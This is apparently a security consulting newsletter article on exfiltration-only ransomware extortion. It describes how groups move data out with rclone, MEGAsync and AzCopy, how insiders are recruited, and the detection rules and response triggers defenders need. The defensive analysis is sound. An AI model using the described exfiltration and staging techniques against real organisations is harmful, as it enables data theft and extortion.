Your Backups Work. Your Ransomware Strategy Doesn’t.

In Short

• Detection is tuned to the wrong signals. Most EDR and SIEM rules focus on encryption activity, ransom notes, and mass file changes. Data-only exfiltration does not trigger those alerts. The tools are working as configured, but they are configured for an outdated threat model.

• Standard insider threat programs cannot detect external recruitment. These programs typically look for behavioral changes before misconduct. Ransomware groups often approach employees with financial offers before any suspicious activity occurs. Without a behavior change, there is no alert. This is a design gap, not a monitoring failure.

• IR playbooks lack a trigger for data-only extortion. Response plans usually activate when systems go down or encryption is detected. If operations continue normally, escalation may not occur. By the time an extortion demand arrives, logs may be incomplete and scope unclear.

• Cyber insurance may not cover data-only scenarios. Many policies tie coverage to encryption or downtime. When neither occurs, coverage disputes can follow. Policy language should be reviewed in advance against a data-only extortion scenario.

Security In Practice | CyOps Consulting Team

The extortion email arrives weeks after the attacker left. Systems are operational. Logs have rotated. No ransom note was delivered. Nothing was encrypted. No alert fired.

You don’t know what was taken, when it was taken, or whether access still persists.

This pattern has emerged in multiple campaigns, including those attributed to ShinyHunters. In these cases, attackers quietly infiltrated corporate cloud environments and exfiltrated sensitive customer data without deploying ransomware or disrupting operations. Systems remained fully functional. No encryption occurred. There were no immediate indicators of compromise.

Weeks later, an extortion demand appeared, often supported by samples of stolen data posted to leak forums. By the time the organization became aware, the intrusion was already over. What remained was uncertainty: what had been taken, how long access had existed, and whether the attackers had left anything behind.

Where Current Thinking Breaks

This is not a tooling gap. It is a threat-model misalignment.

• Your detection logic, insider threat monitoring, response triggers, and insurance language are optimized for encryption. The attacker has shifted to data theft. Your program has not shifted with it.

• Your detection logic was built to fire on encryption events, rapid file modifications, and ransom note creation. None of those occurred. The intrusion unfolded entirely outside the threat model your controls were designed to address.

The gap begins with the assumption that ransomware resilience means the ability to restore encrypted systems. Historically, that model made sense. Ransomware meant encrypted systems, a ransom note, and a recovery decision. That understanding shaped how EDR vendors wrote alert rules, how SIEM engineers built detection logic, how incident response teams defined escalation criteria, how tabletop exercises were framed, and how cyber insurance underwriters defined a covered event.

But the economic logic has shifted. Ransomware payment rates are declining, while attack volumes climbed 47% year-over-year. Encryption creates forensic artifacts, accelerates defender response, and provides victims with a recovery path that reduces payment pressure. An operator who skips encryption eliminates all three disadvantages. Exfiltration alone delivers comparable extortion leverage. This is not a tactical tweak. It is an economic decision with a clear payoff structure.

The detection implications are straightforward. When your controls trigger on file modification rates, ransom note creation, or cryptographic library calls, exfiltration-only operations generate none of those signals. They proceed without alerting.

The problem compounds at the tooling layer. Ransomware groups such as Conti, DarkSide, Qilin, and BlackCat regularly use legitimate business file-transfer tools like rclone, MEGAsync, and Azure AzCopy to gather and exfiltrate stolen data, which helps them avoid detection. Signature-based controls often miss this activity. Volume-based DLP generates alerts on routine marketing exports and developer pushes just as readily as on attacker-driven bulk exfiltration. Without behavioral baselines, your controls cannot distinguish normal business activity from adversarial staging.

This failure appears in your detection layer, in your response triggers, and in the assumptions underpinning your insider threat program.

Three Gaps Your Current Program Doesn't Cover

Gap 1: Detection Logic Built for a Different Attack

Your EDR and SIEM rules trigger on encryption behavior: rapid file modifications, ransom note creation, crypto library calls. In an exfiltration-only attack, none of those events occur. The signals your controls are waiting for never appear. The intrusion runs and your stack remains silent.

You already know rclone, MEGAsync, and Azure AzCopy exist in your environment, and groups including Conti, DarkSide, Qilin, and BlackCat have documented their use for data staging and transfer. Signature-based detection fails not because these tools are obscure, but because they are legitimate. Your IT and DevOps teams rely on them. A rule that blocks rclone execution would interrupt business-critical workflows. So there is no rule, or the rule is burdened with exceptions that neutralize it.

Volume-based DLP does not close the gap. Marketing sends large datasets. Developers push substantial code commits. Backup jobs move bulk data overnight. Without user-level behavioral baselines, DLP thresholds trigger on normal activity as often as on attacker activity. Analysts begin to ignore the alert class because it fires constantly. The control technically exists, but operational noise has disabled it.

The consequence is a mean time to detection measured in months rather than days. You learn about the breach from an FBI notification, a dark web monitoring alert, or a customer who finds their own data posted publicly. By then the data has been redistributed, logs have rotated, and volatile evidence is gone. Your controls generate no signal because they were designed to detect a different event.

Gap 2: Insider Threat Programs Miss the Recruitment Vector

Most insider threat programs are built around a specific behavioral model: an employee becomes dissatisfied, then acts. The program monitors for anomalous access patterns, unusual data movement, and policy violations among existing staff. That logic is reactive. It requires a detectable change in internal behavior before it can trigger. External recruitment produces no internal behavior change before access is provided.

Ransomware groups are running structured recruitment operations. They solicit employees through Telegram, darknet forums, LinkedIn direct messages, and direct phone calls. Financial offers range from $3,000 to $15,000 for initial network access credentials. For example, the Medusa group approached a BBC employee with an opening offer of 15% of the ransom demand, then escalated to 25% when the employee didn't immediately respond. This was not opportunistic outreach. It followed a negotiation pattern.

The trusted-role problem compounds the risk. In one recent case, two cybersecurity professionals pleaded guilty to active collaboration with the BlackCat ransomware group. Insider threat programs often concentrate monitoring on low-privilege accounts or recently disciplined employees. They are not designed to scrutinize high-trust roles with deep access and strong reputations. Yet those roles carry the highest recruitment value.

The coordination gap between HR and security widens the exposure. Workforce reductions create financially stressed employees who still hold elevated access during transition periods. Security teams rarely receive advance notice of layoff schedules. Access reviews occur after notification, not before. The highest-risk phase of the employee lifecycle is left unmonitored by design. Organizations discover insider facilitation during post-incident forensics. Detection occurs at prosecution, not at access grant.

External recruitment is a program design failure. Your current controls cannot detect an approach that happens entirely outside your systems.

Gap 3: Response Playbooks Don't Trigger Without Encryption

Most incident response plans encode the same assumption: ransomware means systems are unavailable. The playbook activates when systems go down. If an attacker skips encryption, systems remain fully operational. The playbook never activates. The response chain does not begin.

The forensic consequence of delay is severe. The extortion email arrives weeks after exfiltration. At that point your team cannot determine scope, timeline, access vector, or whether persistence remains. Logs have rotated. Memory artifacts are gone. The attacker has had time to redistribute or sell the data. You enter negotiation without knowing your own exposure.

The Everest group's 2026 attack on Iron Mountain illustrates this failure mode. Exfiltration only. Extortion demand issued. No encryption event. No system outage. No ransom note to trigger standard procedure. The playbook had no activation point.

The insurance dimension is concrete. Policies that define ransomware as an encryption event are generating active coverage disputes when data is stolen without encryption. If you have not reviewed your policy language against a data-only extortion scenario, you do not know whether coverage applies when you need it most.

Tabletop exercises have not caught up. Most still simulate systems-down scenarios such as a hospital losing EHR access, a manufacturer loses production control. Teams practice recovery decisions. They rarely rehearse the scenario where everything functions and data is gone. There is no practiced trigger, no rehearsed escalation path, no structured method for determining scope when encryption artifacts do not anchor the timeline.

Detection and response are separate failures with separate causes. Fixing one does not fix the other.

Adjusting Your Defenses

Each of these gaps has a different root cause and a different remedy. None require replacing your existing stack. They require changing what your controls look for and when your response chain begins.

This Week

Query your EDR and SIEM for execution of rclone, MEGAsync, and Azure AzCopy. Exclude accounts with documented IT or DevOps use cases. Review command-line arguments that indicate bulk transfer. Flag any destination IP addresses or cloud endpoints not present in your asset inventory. Execution outside documented business use warrants immediate investigation, not backlog placement.

Pull 90 days of large outbound data transfers during off-hours, grouped by individual account. Volume alone is not the signal. The anomaly is volume at a time inconsistent with that account's historical pattern. Compare off-hours transfer volume against each user's 90-day daytime baseline. Set thresholds per account, not per environment.

Enumerate all active OAuth authorizations connecting third-party cloud storage applications to corporate accounts. Revoke any authorization without documented business justification. In most cloud identity platforms this can be completed quickly and removes a persistent exfiltration path that does not require ongoing attacker access.

Run a paper exercise with your IR lead using this scenario: an extortion email arrives today, systems are operational, no encryption event, no ransom note. Answer four questions. What triggers response activation? Who is notified first? What is the first forensic preservation step? How is scope determined without encryption artifacts? Any uncertainty identifies the precise activation gap described in Gap 3.

This Quarter

Begin building user-level behavioral baselines for data movement in your SIEM or UEBA platform. Log per-account transfer volume, transfer timing, destination classification (corporate endpoints, consumer cloud services, or unclassified external), and data type where DLP tagging exists. Baselines require 30 to 60 days of stable data before generating reliable signal. Start logging configuration now. Procurement decisions can follow later.

Author exfiltration-specific detection rules within your existing EDR. Monitor for large archive creation through 7z, zip, or tar followed by outbound transfer. Flag access to file shares or repositories by accounts without documented business need. Identify staging behavior in temp directories or user-profile paths preceding transfer events. These behaviors are observable with current tooling. The constraint is authoring time.

Add a targeted scenario to your next security awareness cycle. Explain what an employee should do if offered payment for network access through any channel, including personal phone, personal email, or social media. Define the reporting path. State clearly that reporting is non-punitive. Emphasize that IT, security, and other privileged roles are targeted at higher rates. Most awareness programs do not address this. Employees cannot follow a protocol that does not exist.

Request advance notification from HR regarding workforce reductions or restructuring events. Conduct privileged access review before announcement. Focus on accounts with access to sensitive repositories, cloud storage with broad write permissions, and identity provider administrative roles. Treat reduction-in-force events as security-relevant events requiring coordination, not as HR processes that security reacts to afterward.

This Cycle

Add exfiltration-specific activation criteria to your IR plan alongside existing encryption triggers. Include anomalous data movement identified in your SIEM, third-party notification of data exposure, customer reports of leaked data, confirmed dark web data appearance, or receipt of a credible extortion communication without encryption. Each must activate the same escalation path, forensic preservation steps, and legal review as a systems-down event.

Review your cyber insurance policy and locate the ransomware definition. If coverage requires encryption, system unavailability, or a ransom note, request written clarification from your broker regarding data-only extortion before renewal. Coverage disputes in this scenario are documented. Discovering a policy gap during an active incident leaves no corrective path.

Assess whether your DLP inspects outbound transfers over TLS to consumer cloud storage. Many legacy deployments do not. SSL inspection may be disabled or scoped to exclude consumer endpoints for performance or privacy reasons. This assessment clarifies your actual detection coverage and informs future tooling decisions.

The sequencing matters. Behavioral baselining started this quarter must accumulate data before producing useful signal. IR plan revisions this cycle should incorporate the activation gaps identified in this week's exercise.

The Decision Framework

Detection is prerequisite to response. You cannot respond to what you cannot see. Improving the playbook without improving detection yields a stronger response to an event you still fail to identify. A recruited insider using legitimate credentials generates activity that appears normal. If Gap 2 remains unaddressed, the other controls lose relevance. Your playbook triggers when systems fail. This attack leaves them running.

Your organization built ransomware resilience around system restoration. This threat targets data confidentiality. Stolen data cannot be restored from backup. It can only be detected before exfiltration and contained before extortion. The required investment lies in detection logic and response procedures for this attack type. Backups protect availability. They do not protect confidentiality. Data-only extortion is a confidentiality breach.

In healthcare, patient data exfiltration triggers HIPAA breach notification obligations regardless of encryption. In financial services, data theft triggers regulatory notification requirements independent of system disruption. In manufacturing, intellectual property theft creates competitive harm that recovery procedures cannot reverse. Once the data leaves, the advantage is lost.

What To Watch Next

The same economic logic driving exfiltration-only operations will continue to shape operator behavior. When encryption accelerates defender response, reduces payment pressure, or triggers insurance exclusions, it becomes optional. Data theft alone preserves leverage while avoiding those disadvantages. If encryption pressure declines further, operators will increase multi-vector coercion to restore it.

Some groups are already combining DDoS attacks with data theft to apply simultaneous operational and reputational pressure. This is not tactical creativity for its own sake. It is economic calibration. When one lever weakens, another is added. If your DDoS mitigation and ransomware response operate under separate plans, run a tabletop that exercises both concurrently. A dual-pressure scenario should activate the same escalation path as a systems-down event.

Recruitment patterns are evolving under the same incentive structure. When external access brokers become more visible and defensive controls tighten, operators expand inward. Ransomware groups are recruiting through gig economy channels, including delivery personnel, maintenance contractors, and facilities staff, to obtain physical network access when remote vectors are insufficient. Conduct a bounded review. Identify who holds unescorted physical access to network infrastructure under current vendor controls and confirm what those controls require in practice. Physical access remains an underpriced variable in most ransomware models.

Continue tracking operator activity through NCC Group's monthly ransomware reports, Recorded Future's threat intelligence reporting, and Cyble's tracking. These sources follow Medusa, Everest, and Qilin with sufficient operator-level detail to inform detection updates and IR trigger adjustments. If payment rates continue to decline, economic pressure will continue to favor exfiltration-first or multi-vector extortion models. Defensive adjustments must track that incentive structure, not last year's tooling patterns.

Special thanks to Hostinger for bringing you today’s content. If you need hosting get our exclusive 20% discount now at Hostinger.

Brought to by the CyOps Consulting Team. Discover our most recent publication.